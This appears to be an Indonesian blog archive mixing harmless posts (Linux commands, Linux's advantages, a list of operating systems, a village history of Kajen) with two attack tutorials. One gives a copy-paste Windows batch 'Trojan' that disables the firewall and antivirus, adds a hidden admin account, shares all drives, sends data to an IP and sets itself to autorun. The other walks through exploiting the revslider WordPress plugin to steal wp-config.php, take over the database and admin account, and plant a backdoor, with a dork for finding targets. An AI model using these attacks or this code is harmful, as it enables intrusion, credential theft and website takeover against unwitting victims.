  • grep : Global regular expresion parse atau grep adalah perintah untuk mencari file-file yang mengandung teks dengan kriteria yang telah Anda tentukan.
  • wc: Word Count, menampilkan jumlah bytes, kata dan baris dalam suatu file .
  •  vi: Teks editor vi.Syntax : vi [nama_file].
Beberapa perintah dasar vi yang banyak digunakan adalah : i : masuk ke mode INSERT, agar dapat melakukan pengetikan. dd : untuk menghapus sebanyak 1 baris. dnd : untuk menghapus sebanyak N baris. yyp : untuk meng-copy 1 baris penuh. [ESC] : untuk keluar dari mode yang sedang aktif. :w : untuk menyimpan file (w = write). :q : untuk keluar dari vi (q = quit). :wq : untuk menyimpan file dan langsung keluar dari vi (wq = write quit)Syntax : wc [options] nama_file
  • su: Untuk berganti user aktif. Jika hanya menggunakan su saja maka diasumsikan user yang dituju adalah root.
  • chgrp: Untuk mengganti grup pemilik suatu file atau direktori
  • cal: Menampilkan kalender
  • du: Menampilkan penggunaan kapasitas harddisk oleh suatu direktori.
  • df: Menampilkan penggunaan partisi harddisk secara keseluruhan. df –h
  • head: Secara default menampilkan 10 baris pertama pada suatu file. Jika ingin menampilkan jumlah baris yang berbeda dapat menggunakan option –n diikuti jumlah baris yang diinginkan.
  • history: Menampilkan perintah-perintah yang telah digunakan sebelumnya. Note: Linux memiliki fasilitas untuk menyimpan perintah-perintah yang pernah digunakan.
  • init: Untuk mengganti run level. Note: Karena penggunaan run level adalah hal yang berpengaruh besar pada sistem, maka untuk melakukan ini harus menggunakan SUPER-USER atau yang memiliki kemampuan sama dengan root.
  • ping: Untuk melakukan test konektivitas/hubungan antara dua komputer dalam suatu jaringan (LAN).
  • logout: Untuk keluar dari sistem.
  • Find : Untuk menemukan dimana letak sebuah file. Perintah ini akan mencari file sesuai dengan kriteria yang Anda tentukan. Sintaksnya adalah perintah itu sendiri diikuti dengan nama direktori awal pencarian, kemudian nama file (bisa menggunakan wildcard, metacharacters) dan terakhir menentukan bagaimana hasil pencarian itu akan ditampilkan.
  • More :Mempaging halaman, seperti halnya less
  • Zip : Perintah ini akan membuat dan menambahkan file ke dalam file arsip zip. Lihat juga perintah gzip dan unzip. 
Sekian yang dapat saya share, semoga bermanfaat bagi kita semua…
Wassalamualaikum Wr. Wb.

Saturday, May 28, 2016

Kelebihan Linux yang jarang di ketahui kebanyakan orang

Linux adalah sebuah Unix-jenis sistem operasi awalnya dibuat oleh Linus Torvalds dengan bantuan dari pengembang di seluruh dunia. Dikembangkan di bawah GNU General Public License, kode sumber untuk Linux tersedia secara bebas untuk semua orang.Ada banyak Varian dari Linux yang di kembangkan di seluruh dunia sebagai Sistem operasi yang Free dan Open source yang sering di kenal dengan Istilah FOSS (Free/Open Source Software).Foss adalah Konsep berbagi , merdekan dan terbuka.

  • Anda tidak perlu membeli Linux OS dan mengeluarkan Uang yang mahal untuk membeli CD Windows yang Original.
  • Anda tidak Perlu takut Untuk di Sweeping atau di Razia Software karena Linux Free.
  • Anda telah membantu mengurangi Pembajakan Software dan tidak perlu membeli Licensi Key/ Keygen.
  • Apakah Anda suka internet? The TCP / IP protokol dibangun pada UNIX komputer (Linux)
  • sedangkan Windows hanya embraced TCP / IP sebagai protokol asli dari Windows 2000.
  • Sobat tidak perlu defragment Linux Selalu untuk selamanya..^_^
  • Linux lebih aman karena Linux memiliki filosofi menjalankan proses pada tingkat
  • terendah yang diperlukan akses.
  • lebih dari 80% dari atas 500 supercomputers di dunia menjalankan Linux
  • Jika anda memerlukan sebuah kantor suite Anda dapat men-download Open Office (Free)
  • Anda tidak menderita vendor lock-in dengan Linux.
  • Linux OS dapat menjalankan distribusi yang sama persis pada sistem 32-bit, 64-bit sistem sedangkan Windows Bajakan yang sering digunakan di Indonesia adalah Windows 32 Bit.
  • Komunitas linux adalah orang yang berlimpah dengan keinginan untuk saling membantu memecahkan masalah apapun pengalaman serta berbagi tips dan ide untuk kreativitas.
  • Linux tidak crash tanpa alasan jelas sewaktu di Jalankan.
  • Linux tidak dapat membuat sistem anda unusable seperti yang sering di temukan di Windows.
  • Pada Sistem Operasi Windows ketika selesai Update Antivirus dan Instal software seringnya meminta untuk Restart/reboot bahkan kadang Restart secara Otomatis (Windows Maksa Bro biar systemnya Update).Tetapi Linux tidak reboot dengan sendirinya (Otomatis)
  • Linux dapat membaca dengan baik lebih dari seratus berbagai jenis file system.
  • Sobat memiliki hak untuk mengubah apa-apa saja yang berada di dalam Linux jika memiliki kemampuan dan skill asal masih mencantumkan Varian Linuxnya.
  • Sobat tidak akan terjebak dengan legacy application dimana vendor maupun providernya telah ditutup dan tak dapat memperbaruinya.
  • Linux happily akan menginstal sendiri pada partisi hardisk logis. Anda tidak dibatasi untuk partisi utama.
  • Linux dapat dijalankan dari CD tanpa harus mempengaruhi apa yang sudah di hard disk dari komputer.(IGOS OS yang murni Sistem Operasi buatan Indonesia yang di ambil dari Varian Fedora Linux pernah memberikan saya Live CD IGOS...Thanx IGOS..Promosi dikit)
  • Tidak ada 1 Sistem Operasipun yang bisa meng-klaim terbebas dari serangan Virus maupun Trojan termasuk Linux.Tapi setidaknya Linux tetap lebih aman karena Linux merupakan Open source dan masih sedikitnya orang yang mengetahui tentang Scripting pembuatan Virus di Linux..hehe
  • Pada Linux Anda mendapatkan khusus suite yang berisikan pendidikan dan permainan. Windows versi ini tidak dikembangkan, dan harus membeli Licensi.
  • Anda tidak perlu untuk mencari Resor vendor atau menggunakan situs Windows Update untuk melakukan sesuatu pekerjaan.
  • Anda dapat membuat sendiri distro Linux jika Anda inginkan. Bayangkan "MyLinux" untuk diberikan kepada semua teman dan keluarga Anda.(Ga kebayang kalau ada "DevitLinux" Mimpi kali y...Boleh dong...hehe).Kidding Sob...dan dengan catatan kita bisa mendistribusikannya ke setiap orang tanpa harus per-izinan alias Birokrasi dan akhirnya anda terkenal deh..
  • Linux dapat membantu Anda menghapus spam tanpa biaya. Bahkan, Spam Assassin - salah satu yang paling populer open source anti-spam system - adalah dasar dari banyaknya komersial produk anti-spam. Kontras oleh produk seperti Symantec Mail Keamanan adalah sekitar $ 30/mailbox. Layanan seperti MessageLabs juga biaya per surat.
  • (Waw mending buat email Baru deh kalau email Saya di kirim Spam Assassin daipada Bayar!)
  • Perangkat lunak open source menawarkan versi yang lebih baik dari Microsoft Office SharePoint Server dari Microsoft
  • Linux adalah sebuah sistem multi-user . Anda dapat memiliki banyak ratusan semua pengguna Linux yang bekerja di salah satu sistem. Sedangkan Windows Terminal Services menawarkan tapi tidak standar, dan ada yang ekstra lisensi per pengguna.
  • Linux sangat kuat bahasa scripting yang memberikan kekuatan besar untuk sistem administrator.
  • Proyek honeypot menemukan bahwa sebuah unpatched Linux server dapat lebih bertahan jika terkoneksi dengan Internet.sementara patch Windows' server akan bangkrut dalam waktu beberapa jam.Bahkan tanpa patch, Linux masih lebih baik daripada Windows.
  • An out-of-the-box sistem Linux dapat digunakan untuk yang jauh lebih besar dari berbagai kepentingan yang out-of-the-box sistem Windows. Anda akan mail server, web server, database server, dan file-print server, intranet server, remote akses server, VPN server, server FTP - apapun yang Anda inginkan, benar-benar.
  • Linux tidak membatasi bagaimana konten digunakan pada sistem. Tidak ada manajemen hak digital (DRM) perlambatan bawah komputer atau menyebabkan konflik dengan hardware atau software. Tinggi kualitas audio visual keluaran tidak artificially direndahkan. Dengan Linux anda dapat memutar musik, menonton film dan menjalankan perangkat lunak. Sistem operasi tidak akan terganggu dengan adil-hak untuk menggunakan konten Anda sendiri.
  • Sobat tidak akan menanyakan ke Mama...Ma mengapa RUNDLL32.EXE ?? hehe..^_^
  • Berapa banyak kertas dan plastik yang digunakan untuk membuat dan mendistribusikan semua kotak set produk Microsoft? Linux adalah bebas didownload dari Internet.
  • Beberapa vendor perangkat keras seperti ASUS akan mencari embedding Linux di silicon untuk membuat generasi berikutnya komputer mulai lebih cepat. Anda tidak boleh melakukan ini dengan Windows, dan jika tidak mungkin ia akan datang dengan kenaikan harga karena perizinan.
  • Linux tidak akan mati karena open source dan Free.Tidak seperti Sistem Operasi yang Lain.Maaf Y Vendor yang OS yang telah Tutup BeOS, AmigaOS
~ Demikiab dan terimakasih ~

                                                  Friday, May 27, 2016

                                                  Jenis Jenis Operating System(OS)






                                                  1. Windows
                                                  Microsoft Windows atau yang lebih dikenal dengan sebutan Windows adalah keluarga sistem operasi. yang dikembangkan oleh Microsoft, dengan menggunakan antarmuka pengguna grafis.
                                                  Sistem operasi Windows telah berevolusi dari MS-DOS, sebuah sistem operasi yang berbasis modus teks dan command-line. Windows versi pertama, Windows Graphic Environment 1.0 pertama kali diperkenalkan pada 10 November 1983, tetapi baru keluar pasar pada bulan November tahun 1985, yang dibuat untuk memenuhi kebutuhan komputer dengan tampilan bergambar. Windows 1.0 merupakan perangkat lunak 16-bit tambahan (bukan merupakan sistem operasi) yang berjalan di atas MS-DOS (dan beberapa varian dari MS-DOS), sehingga ia tidak akan dapat berjalan tanpa adanya sistem operasi DOS. Versi 2.x, versi 3.x juga sama. Beberapa versi terakhir dari Windows (dimulai dari versi 4.0 dan Windows NT 3.1) merupakan sistem operasi mandiri yang tidak lagi bergantung kepada sistem operasi MS-DOS. Microsoft Windows kemudian bisa berkembang dan dapat menguasai penggunaan sistem operasi hingga mencapai 90%.






                                                  2. Mac OS
                                                  Mac OS adalah singkatan dari Macintosh Operating System. Mac OS adalah sistem operasi komputer yang dibuat oleh Apple Computer khusus untuk komputer Macintosh dan tidak kompatibel dengan PC berbasis IBM. Diperkenalkan pada tahun 1984, Mac OS sejak tahun 2006 telah memiliki kompatibilitas dengan arsitektur PowerPC maupun x86.
                                                  Mac OS X adalah versi terbaru dari sistem operasi Mac OS untuk komputer Macintosh. Sistem operasi ini pertama kali dikeluarkan pada tahun 2001. Karakter "X" adalah nomor Romawi yang berarti sepuluh, di mana versi ini adalah penerus dari sistem operasi yang digunakan sebelumnya seperti Mac OS 8Mac OS 9. Beberapa orang membacanya sebagai huruf "X" yang terdengar seperti "eks". Salah satu alasan mengapa mereka menafsir sedemikian karena tradisi untuk memberikan nama sistem operasi yang berbasis Unix dengan akhiran "x" (misalnya AIX, IRIX, Linux, Minix, Ultrix, Xenix). dan Mac OS X Server juga dirilis pada tahun 2001. Pada dasarnya versi Server ini mirip dengan versi standardnya, dengan perbedaan bahwa versi Serverworkgroup dalam komputer berskala besar. Contoh fitur tambahan yang tersedia untuk versi ini adalah piranti lunak untuk menjalankan fungsi-fungsi seperti SMTP, SMB, LDAP dan DNS. Selain itu cara melisensinya juga berbeda. mencakup piranti lunak untuk keperluan manajemen dan administrasi Mac OS X adalah sistem operasi yang menggunakan kernel BSD sehingga beberapa kalangan mengatakan bahwa Mac OS X termasuk dalam keluarga Unix. Hal yang menarik dari OS ini adalah keindahan tampilannya sehingga menjadikannya panutan bagi pengembang desktop lain.




                                                  3. Linux
                                                  Linux (diucapkan ˈlɪnəks atau /ˈlɪnʊks/) adalah nama yang diberikan kepada sistem operasi komputer bertipe Unix. Linux merupakan salah satu contoh hasil pengembangan perangkat lunak bebas dan sumber terbuka utama. Seperti perangkat lunak bebas dan sumber terbuka lainnya pada umumnya, kode sumber Linux dapat dimodifikasi, digunakan dan didistribusikan kembali secara bebas oleh siapa saja.
                                                  Nama "Linux" berasal dari nama pembuatnya, yang diperkenalkan tahun 1991 oleh Linus Torvalds. Sistemnya, peralatan sistem dan pustakanya umumnya berasal dari sistem operasi GNU, yang diumumkan tahun 1983 oleh Richard Stallman. Kontribusi GNU adalah dasar dari munculnya nama alternatif GNU/Linux.




                                                  4. Google Chrome OS
                                                  Google Chrome OS adalah sistem operasi sumber terbuka yang dirancang oleh Google Inc. untuk bekerja secara eksklusif dengan aplikasi web.Google Chrome OS diumumkan pada tanggal 7 Juli 2009, dan versi stabilnya akan diluncurkan umum pada paruh kedua tahun 2010. Sistem operasi ini berbasis Linux dan hanya akan berjalan pada pada perangkat keras yang dirancang khusus. Antarmuka penggunanya dirancang mengambil pendekatan minimalis, seperti penjelajah web Google Chrome. Sistem operasi ini ditujukan bagi mereka yang menghabiskan sebagian besar waktunya di Internet.








                                                  5. Rich OS
                                                  RISC OS (pron.: / rɪskoʊɛs /) [4] adalah sistem operasi komputer awalnya dirancang oleh Acorn Computers Ltd di Cambridge, Inggris pada tahun 1987. RISC OS secara khusus dirancang untuk berjalan pada chipset ARM, yang telah dirancang Acorn, untuk digunakan dalam lini baru dari komputer pribadi Archimedes.




                                                  6. XTS 400
                                                  The XTS-400 adalah multi-level sistem operasi komputer yang aman. Ini adalah multi-user dan multitasking. Ia bekerja di lingkungan jaringan dan mendukung Gigabit Ethernet dan IPv4 dan IPv6.
                                                  The XTS-400 merupakan kombinasi dari hardware Intel x86 danSecure Trusted Operating Program (STOP) sistem operasi. XTS-400 dikembangkan oleh BAE Systems, dan awalnya dirilis sebagai versi 6.0 pada bulan Desember 2003.




                                                  7. BeOS
                                                  BeOS adalah sistem operasi untuk komputer pribadi yang mulai dikembangkan oleh Be Inc pada tahun 1991. Ini pertama kali dibuat untuk berjalan pada hardware BeBox. BeOS dibangun untuk pekerjaan media digital dan dibuat untuk mengambil keuntungan dari fasilitas perangkat keras modern seperti multiprocessing simetris dengan memanfaatkan bandwidth yang modular I / O, pervasive multithreading, preemptive multitasking.




                                                  8. AmigaOS
                                                  AmigaOS adalah sistem operasi milik asli dari komputer pribadi Amiga. Ini dikembangkan pertama kali oleh Commodore International dan diperkenalkan dengan peluncuran Amiga pertama, Amiga 1000, pada tahun 1985.




                                                  9. OS/2
                                                  OS / 2 adalah serangkaian sistem operasi komputer, awalnya dibuat oleh Microsoft dan IBM, kemudian dikembangkan oleh IBM secara eksklusif.




                                                  10. MorphOS
                                                  MorphOS adalah Amiga-kompatibel OS komputer. Ini adalah campuran proprietary dan open source OS yang diproduksi untuk komputer Power PC prosesor berbasis Pegasos, akselerator PowerUp dilengkapi komputer Amiga, dan serangkaian papan pengembangan Freescale yang menggunakan firmware Genesi, termasuk EFIKA dan mobileGT.




                                                  11. Garuda OS
                                                  Garuda OS adalah Distro Linux berbasis PCLinuxOS Fullmonty Edition buatan pengembang Indonesia yang mendukung penggunaan dokumen format SNI (Standar Nasional Indonesia), aman dari gangguan virus komputer, stabilitasnya tinggi, disertai dukungan bahasa Indonesia dan dilengkapi dengan program-program dari berbagai macam kategori. Bisa diperoleh secara bebas tanpa harus mengeluarkan biaya untuk pembelian lisensi.




                                                  12. UNIX
                                                  UNIX adalah Sistem Operasi yang diciptakan oleh Ken Thompson dan Dennis Ritchie, dikembangkan oleh AT&T Bell Labs. UNIX didesain sebagai Sistem Operasi yang portabel, Multi-Tasking dan Multi-User. Sistem Operasi UNIX lebih menekankan diri pada Workstation dan Server, Karena faktor ketersediaan dan kompatibilitas yang tinggi menyebabkan UNIX dapat digunakan, disalin dan dimodifikasi sehingga UNIX pun dikembangkan oleh banyak pihak dan menyebabkan banyak sekali varian dari UNIX ini.




                                                  13. AIX
                                                  Salah satu pasaing UNIX adalah IBM AIX. AIX mengklaim mempunyai journaling filesystem terbaik, mampu mencatat seluruh disk transaction yang terjadi, sehingga mampu me-recover system tanpa banyak masalah kemampuan ini meningkatkan reliability. AIX juga berbasis BSD.




                                                  14. FREE BSD
                                                  FreeBSD adalah Sistem Operasi bertipe UNIX bebas yang diturunkan dari UNIX AT&T. FreeBSD berjalan di atas sistem intel x86. FreeBSD sendiri kali pertama muncul pada tahun 1993 oleh David Greenman. Tujuan dari FreeBSD adalah menyediakan software yang dapat digunakan untuk berbagai kepentingan. FreeBSD sendiri dikembangkan dari 386BSD sebuah proyek pengembangan BSD OS yang berjalan di atas Chip Intel.




                                                  15. SUn SOlaris
                                                  Sistem Operasi Solaris adalah sebuah Sistem Operasi yang berdasarkan UNIX system yang diperkenankan oleh Sun Microsystems oada tahun 1992 sebagai pendukung SunOS. Solaris terkenal karena kestabilannya, khususnya pada sistem SPARC (Scalable Processor Architecture), Solaris disertifikasi dalam Spesifikasi UNIX walaupun pada awal pengembangannya berdasarkan kepemilikan pribadi, dan kebanyakan kode dasarnya sekarang ini merupakan Software OpenSource yang biasa dikenal dengan OpenSolaris. OpenSolaris adalah OpenSource versi Sistem Operasi Sun Solaris, tetapi Sun Solaris terdiri dari lebih beberapa kode yang tidak hanya inti dari Sistem Operasi misalnya : Source untuk Installer, Desktop, Software.




                                                  16. DOS
                                                  Disk Operating System (disingkat DOS) adalah keluarga sistem operasi yang digunakan di komputer pribadi. Sekarang, istilah DOS menjadi istilah generik bagi setiap sistem operasi yang dimuat dari perangkat penyimpanan berupa disk saat sistem komputer dinyalakan




                                                  17. Novell Netware
                                                  Novell NetWare adalah sebuah sistem operasi jaringan yang umum digunakan dalam komputer IBM PC atau kompatibelnya. Sistem operasi ini dikembangkan oleh Novell, dan dibuat berbasiskan tumpukan protokol jaringan Xerox XNS.




                                                  18. BlankOn
                                                  BlankOn adalah sistem operasi komputer berbasis Linux yang dikembangkan oleh tim pengembang Linux BlankOn dalam Yayasan Penggerak Linux Indonesia (YPLI). Fitur Linux BlankOn saat ini mampu menghadirkan varian Linux yang sesuai kebutuhan pengguna komputer umumnya di Indonesia, terutama di dunia pendidikan, perkantoran dan pemerintahan.

                                                  membuat Trojan "stealth" atau siluman untuk mencuri password



                                                  Tujuan dari Trojan adalah memperoleh informasi dari target dan mengendalikan target untuk memperoleh hak akses pada target.






                                                  Trojan bersifat "stealth" atau siluman dan tidak terlihat dalam operasinya dan seringkali berbentuk seolah-olah program tersebut merupakan program baik-baik. Penggunaan istilah Trojan atau Trojan horse dimaksudkan untuk menyusupkan kode-kode mencurigakan dan merusak di dalam sebuah program baik-baik dan berguna. Kebanyakan Trojan saat ini berupa sebuah berkas yang dapat dieksekusi (*.EXE atau *.COM) dalam sistem operasi Windows dan DOS atau program dengan nama yang sering dieksekusi dalam sistem operasi UNIX, seperti ls, cat, dan lain-lain yang dimasukkan ke dalam sistem yang ditembus oleh seorang cracker untuk mencuri data yang penting bagi pengguna misalnya: password , data kartu kredit , dan lain- lain.

                                                  Gak usah panjang lebar deh, langsung aja buka notepad lalau copas code berikut :

                                                  @echo off

                                                  color 0a

                                                  cls

                                                  IF not exist %windir%\%0 copy %0 %windir%

                                                  netsh firewall set opmode=disable

                                                  net stop ShareAccess

                                                  Net stop “Security Center”

                                                  Tskill *AV*

                                                  NET USER admin admin123 /ADD

                                                  NET LOCAL GROUP ADMINISTRATORS admin /ADD

                                                  Reg ADD “HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\ SpecialAccounts \UserList” /v”admin” /t REG_DWORD/d 0 /f

                                                  REG ADD HKLM\SYSTEM\ControlSet001\Services\Messenger /v Start /t REG_DWORD /d 2/f

                                                  Net start messenger

                                                  dir *.*>>Filelist.txt

                                                  Net send 192.168.1.100 >hasil.txt

                                                  NET SHARE system=%SYSTEMDRIVE% /UNLIMITED

                                                  NET SHARE data1=D:\ /UNLIMITED

                                                  NET SHARE data1=E:\ /UNLIMITED

                                                  REG ADD HKCR\Network\SharingHandler /ve /t REG_SZ/d “”/f

                                                  REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v forceguest /t REG_DWORD /d 0 /f

                                                  REG ADD HKLD\SYSTEM\CurrentControlSet\LSA /v restrictanonymous /t REG_DWORD /d 0 /f

                                                  REG ADD HKLM\SYSTEM\ControlSet001\Services\TIntSvr /v Start /t REG_DWORD /d 2/f

                                                  Net start tIntsvr

                                                  REG ADD HKLM\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f

                                                  REG ADD HKCU\Software\Microsoft\Windows\pCurrentVersion\Run\v Eksplorer /t REG_SZ /d %windir%\trojan2.bat /f

                                                  efek diantaranya adalah :

                                                  -penyebaran seperti worm jadi mudah berkembang biak
                                                  -disable firewall
                                                  -stop ShareAccess
                                                  -stop Security Center
                                                  -nge kill AV
                                                  -membuat user dengan nama admin123
                                                  -pertahanan pada user admin123
                                                  -menjalankan messenger
                                                  -mengirim kan hasil rekaman ke ip 192.168.1.100

                                                  Selamat mencoba, semoga berhasil...........

                                                  Wednesday, May 25, 2016

                                                  Cara hack website dengan memanfaatkan kelemahan plugin revslider // wordpress




                                                  Kali ini yang bakal dibahas adalah salah satu vulnerability pada salah satu plugin CMS terkemuka yaitu wordpress.
                                                  Vulnerability adl kelemahan pada plugin ini memungkinkan hacker untuk dapat mengunduh file file penting didalam website tersebut untuk kemudian dimanfaatkan untuk menyerang dan mengambil alih kendali pada website tersebut.
                                                  nama plugin nya "revslider" atau slider revolution.
                                                  Nah loh, hati hati bagi yang di website nya menggunakan plugin ini.
                                                  Dari pembuktian yang penulis lakukan terbukti bahwa plugin ini dapat digunakan untuk mengunduh file wp-config.php pada website berbasis cms wordpress.
                                                  Lah trus kenapa emang kalo udah bisa mengunduh file wp-congig.php???
                                                  Wp-config.php ini merupakan file dewa yang apabila jatuh ketangan orang yang salah akan sangat berbahasa, kenapa? file ini berisi tentang setting database yang digunakan pada website, termasuk username, password, host, dan nama database yang digunakan.
                                                  Kalau kita sudah tau login databasenya, yang bisa kita lakukan berikutnya adalah ---- well banyak ---
                                                  Login ke database nya.
                                                  Mau ngerusak? drop aja semua data yang ada.
                                                  Mau coba login ke wordpress nya dengan akses administrator?
                                                  Ubah aja password admin nya dan login.
                                                  atau mau login diam diam tanpa admin tahu?
                                                  Buat akun baru dengan level admin..

                                                  Mau deface dan ubah tampilan utama website dengan latar belakan hitam dan tulisan merah bertulisakan nama keren anda? ubah aja file index.php lewat theme editor wp-nya.

                                                  Mau lebih dalam lagi? takut ketahuan dan login mu di apus admin??
                                                  Upload ada shell script sebagai backdoor.
                                                  Jadi kalaupun anda di depak oleh admin, anda masih bisa masuk ke server lewat shell script backdoor ini.

                                                  ====================================================

                                                  Mau sekalian dibisiki gimana langkah sampe bisa dapetin akses admin di wordpress korban?
                                                  Pertama manfaatkan vulnerability si plugin revslider ini dulu.
                                                  Pastikan web yang akan jadi target terinstall plugin ini.
                                                  Masuk kehalaman

                                                  http://SITUSTAGRET/wp-admin/admin-ajax.php?action=revslider_show_image&img=../wp-config.php

                                                  maka apabila website target tersebut tertanya vulberable, maka file wp-config.php akan terdoanload dengan nama admin-ajax.php
                                                  Buka aja file itu, maka anda akan menemukan setting setting login database seperti dimaksud diatas. (duka via notepad)

                                                  Lanjut..
                                                  Setelah dapat data login database, selanjutnya kita coba masuk ke phpmyadmin.
                                                  http://situstarget.com/phpmyadmin
                                                  Kalau di server website tersebut terinstall phpmyadmin maka kita tinggal login menggunakan data yang sudah kita dapat.

                                                  Sudah muncul data di databasenya??
                                                  Selanjutnya cari tabel user, lihat username admin nya apa, ganti isi kolom password dengan password yang anda inginkan, eits jangan lupa passwordnya di ubah ke md5 dulu yah, online encriptor untuk md5 banyak kok googling aja.

                                                  Seletelah berhasil di ubah di databasenya, masuk ke
                                                  http://situstarget.com/wp-admin
                                                  Login dengan username dan password yang kita ubah tadi.

                                                  Tara...
                                                  Anda sudah masuk sebagai admin..
                                                  Selanjutnya Seterah terserah anda..!!


                                                  ada beberapa kondisi yang harus terpenuhi agar cara tersebut bisa dilakukan. tidak semua site worlpress bisa di hack dg cara ini.. tp ingat.. masih ada jalan menuju roma .. :V

                                                  1. Website harus terinstall plugin revslider yang vulnerable dan plugin tersebut aktif.
                                                  2. Kita harus bisa menghakses mysql server baik dari phpmyadmin atau mysql client.
                                                  Syarat agar bisa mengakses lewat phpmyadmin ya di server website tersebut harus terinstall phpmyadmin.
                                                  Dan syarat agar kita bisa mengakses database mysql selain lewat phpmyadmin adalah setting pada mysql server website tersebut mengizinkan akses dari remote host.
                                                  Jika tidak ada dari dua kondisi ini yang terpenuhi maka kita tidak bisa melakukan apapun walau kita bisa mendapatkan file dewa si wp-config.php

                                                  mau coba praktekin?
                                                  coba cari di google dengan keyword
                                                  DORK (inurl:"plugins/revslider") kembangin lagi dah
                                                  keluar dah tuh website website yang menggunakan plugin ini.



                                                  Tips.
                                                  Jika anda merupakan seorang web administrator dan menyadari bahwa salah satu website anda menggunakan plugin  ini maka segera lakukan update plugin dan pastikan plugin serta tema yang terinstall pada website anda merupakan versi terbaru.

                                                  Jika karena satu dan lain hal anda tidak dapat melakukan update terhadap plugin tersebut, dianjurkan untuk men-disable atau memberikan limitasi pada mysql server agar tidak dapat diakses dari remote.
                                                  Apabila anda menggunakan phpmyadmin maka pastikan phpmyadmin tidak dapat diakses secara langsung (baik dengan menyembunyikan url default phpmyadmin, atau dengan memberikan limitasi sehingga phpmyadmin hanya dapat diakses melalui cpanel misalkan)

                                                  Akhir kata semoga tulisan ini bermanfaat.

                                                  Tuesday, May 24, 2016

                                                  Kajen Pekalongan


                                                  asal usul cerita desa di Kajen Pekalongan


                                                  bubak.kebonagung - kajen kb. pekalongan adlah tempat dmana saya lahir ..dari itu pengen share sedikit ttg asal usul kajen kota kelahiran tercinta .

                                                  ~Kajen~
                                                  Dahulu ada dua adipati yaitu :Adipati Wirokusumo bertempat tinggal di Penjarakan ( sekarang Domiyang, Paningggaran ) dan Adipati Wirodanu yang bertempat tinggal di Luwuk ( Pekiringanalit, Kajen ). Kedua hidup rukun meski hidup berjauhan.
                                                  Dikisahkan, suatu ketika kedua adipati jalan-jalan ke desa Tanjung dan bertemu dengan Dewi Putri Tanjung yang sangat cantik. Mereka pun jatuh cinta, namun Dewi Putri Tanjung lebih memilih Adipati Wirokusumo karena lebih tampan. Akhirnya, mereka pun pecah dalam persahabatan demi mendapatkan Dewi Putri Tanjung.
                                                  Mendengar kedua adipati bertengkar, Nyai Dai ( saudagar dari Batavia yang rumah berada di sebelah timur perempatan Kajen ) keluar rumah dan mendamaikan keduanya. Akhirnya kedua adipati mau berdamai dengan ditandai jabat tangan dan berpelukan serta memberi hormat kepada Nyai Dai.
                                                  Setelah suasana aman, Nyai Dai memberikan petuah besok rejane jaman ( jaman ketika sudah ramai ) tempat ini dinamakan Kajen yang artinya dihormati.
                                                  Demikian sejarah asal usul nama Kelurahan Kajen sebagaimana diceritakan oleh : Kenap, Watubelah dan Hamzah Abdul Bari, Kutorejo.

                                                  Kutorejo_
                                                  Desa Kutorojo berasal dari kata Kutomoyo yang artinya dulu, dirintis oleh Kyai gede Mbah Moyo. Kemudian Desa Kutomoyo disempurnkan menjadi Desa Kutorojo oleh sesepuh desa.
                                                  Berdiri pada hari Senin Pahing tanggal 12 Legono (Dilqijah) abad 18-an. Konon Mbah Moyo adalah seorang abdi dalem putri kerajaan Mataram.

                                                  Tambakroto_
                                                  Dahulu kala desa Tambakroto merupakan hutan belantara dan merupakan hutan yang sangat lebat. Desa Tambakroto berasal dari kata tambak dan papak, kata papak sendiri dalam bahasa Indonesia artinya rata (dalam bahasa Jawa roto). Zaman dahulu sebelum desa Tambakroto diberi nama tersebut, ada beberapa sesepuh di desa tersebut yang terhormat dan terpandang. Mereka adalah Kyai Tambak yang menguasai wilayah Tambakroto bagian timur, pangeran Papak menempati wilayah Tambakroto bagian utara, Bahurekso menempati wilayah bagian selatan, konon di bagian barat desa Tambakroto terdapat sebuah sumur yang bernama sumur sinangka yaitu sumur yang biasa digunakan untuk mandi para bidadari.


                                                  Semua penduduk di desa tersebut sangat patuh dan tunduk kepeda mereka, kehidupan setiap penduduk di desa tersebut sama rata, maksudnya kehidupannya tidak terlalu kaya dan tidak terlalu miskin. Hal itu dikarenakan setiap penduduk yang terlalu kaya maka akan disama ratakan oleh pangeran papak. Sehingga kehidupan desa tersebut damai dan tentram tidak ada kesombongan dan tidak ada orang yang kikir, sehingga dinamakan desa Tambakroto dan sampai sekarangpun kehidupan penduduk desa Tambakroto semua rata.


                                                  Desa Tambakroto mulai ada sejak terjadinya babad desa Tambakroto yang dilakukan oleh pangeran tambak. Namun saat itu belum terbentuk pemerintahan karena belum banyak orang atau penghuninya. Mulainya desa Tambakroto terbentuk pemerintahan yang syah kurang lebih pada masa penjajahan Belanda. Barangkali pada waktu itu penjajah memang menghendaki adanya pemerintahan desa guna mempermudah maksud-maksud koloninya.


                                                  Sebelum Indonesia merdeka, desa Tambakroto secara berturut-turut diperintah oleh tiga orang kepala desa. Kepala desa yang pertama bernama Narso. Selanjutnya estafet kepemimpinan desa dipegang oleh Sami’un. Kemudian Sami’un digantikan oleh Syahid. Ketiga kepala desa ini berkuasa saat penjajahan Belanda. Dan diantara ketiga pemimpin tersebut yang menjabat kepala desa paling lama adalah masa pemerintahan Sami’un.


                                                  Dan pada akhirnya Belanda dapat diusir oleh para pejuang kita. Indonesia pun merdeka. Sejak tahun 1945 sampai sekarang, desa Tambakroto telah dipimpin oleh lima kepala desa. Kepala desa pertama setelah Indonesia merdeka bernama Raki. Beliau memerintah mulai tahun 1945 sampai dengan 1950. berikutnya desa Tambakroto dipimpin oleh Sukarno, beliau menjabat selama 31 tahun yakni tahun 1950 sampai dengan 1981. kepala desa berikutnya adalah Abdul Karim beliau memerintah dari tahun 1981 sampai dengan 1983. beliau memerintah cukup singkat karena hanya sementara. Kades Abdul Karim digantikan oleh Kades Sukidi, beliau berkuasa selama delapan tahun, mulai tahun 1983 sampai dengan tahun 1994. Kemudian kades berikutnya adalah Turadi, beliau menjabat mulai tahun 1994 sampai dengan 2002. Setelah masa jabatan kades habis, selanjutnya masyarakat melakukan pemilihan kades yang baru. Ny. Sumber terpilih sebagai kades Tambakroto, beliau menjabat mulai tahun 2002 sampai dengan sekarang.


